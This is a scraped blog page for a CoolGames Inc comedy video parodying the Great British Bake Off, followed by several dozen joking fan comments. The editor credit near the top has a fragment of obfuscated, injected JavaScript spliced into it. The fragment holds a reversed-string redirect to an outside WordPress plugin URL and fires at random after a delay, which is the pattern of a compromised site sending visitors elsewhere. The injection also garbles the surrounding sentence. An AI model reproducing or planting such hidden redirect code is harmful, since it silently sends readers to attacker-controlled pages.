Griffin and Nick’s Great British *Bake* Off — CoolGames Inc

LISTEN TO THE FULL EPISODE, “Dr. Robotnik’s Dinner Blasterz”:
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Edited by Claytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Ashley:

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32 thoughts on “Griffin and Nick’s Great British *Bake* Off — CoolGames Inc”

  1. im0james0bond7 says:

    4,200 views god that is perfect.

  2. steynie8 says:

    After watching this, I will never see Paul Hollywood in the same way…

  3. OneColdMonkey says:

    Hell, you could even keep it about baking and just infuse it with weed. I gotta believe there's room in this world for a high-class high-baking show.

  4. Andrew Power says:


  5. Frank Trinidad says:

    mmmh dank !

    make my day XD

  6. Mat Montgomery says:

    In my household, all subsequent seasons of The Great British Bake Off will be referred to as "Oops! No Berries."

  7. Mat Montgomery says:

    This is easily the best one yet. God. Just, everything.

  8. EmpressOfTrash says:

    when are they gonna make edibles on bake off

  9. Logan Weeks says:

    "does he like my scones? does he wanna fuck? what is this???"

  10. roidroid says:

    Don't smoke that one Mary, it's a bad bake vape.

  11. bronzeowl9 says:

    leave air bud alone

  12. Tranum13 says:

    Mmm, Dank!

  13. bronzeowl9 says:

    mary jane berry

  14. Ross Llewallyn says:

    You know this is a vintage CGI nug because it came from Tweeter.

  15. Landon Hart says:

    Did I miss a running joke that Griffin says discreet when he means distinct, or is he just getting it wrong? I've heard him say it like half a dozen times now.

  16. Chris Moore says:

    I was excited to show my Mom this video because she loves Great British Bake Off but I can't now!!!

  17. woohoojazelyn says:

    Was it a coincidence that I got a weed-growing commercial before this video started?

  18. KoRMaK1 says:

    You've described action bronson's "f*ck, that's delicious"

  19. Gothingbop says:

    Air Bud

  20. TheGameGuy says:

    Mmmmm Dank!

  21. Johnathon MacHaim says:

    "Mmm, dank!" – Mary Berry 2017

  22. ThatGuy says:

    I'm impressed that Griffin's impression of Mary Berry sounds like Garfield the deals warlock

  23. Sweet Peach says:

    this killed me because i didnt know that the hosts quit

  24. ensign Cook says:

    The editor killed it

  25. eedobaba7726 says:

    Judging by all the additional visual goofs, I feel like this Clayton Ashley is definitely funny enough to appear as a guest on the podcast eventually.

  26. heliumtrapeze says:

    the other day mary berry was on a show i was watching, the BBC coverage of the RHS Chelsea flower show, she was showing the viewer around her garden and we got to meet her dogs it was a v calming watch, would recommend

  27. die fuc says:

    does he like my scones? does he want to fuck?

  28. Juliette Watkins says:

    3:11 nicks flawless welsh accent there

  29. Nathan McKee says:

    Ed Balls.

  30. "[...][...][...][....]"~ .Swetru says:

    Marry barry high imploves me.

  31. zoetherebel says:

    I would watch the fuck out of Mary Berry getting blazed.

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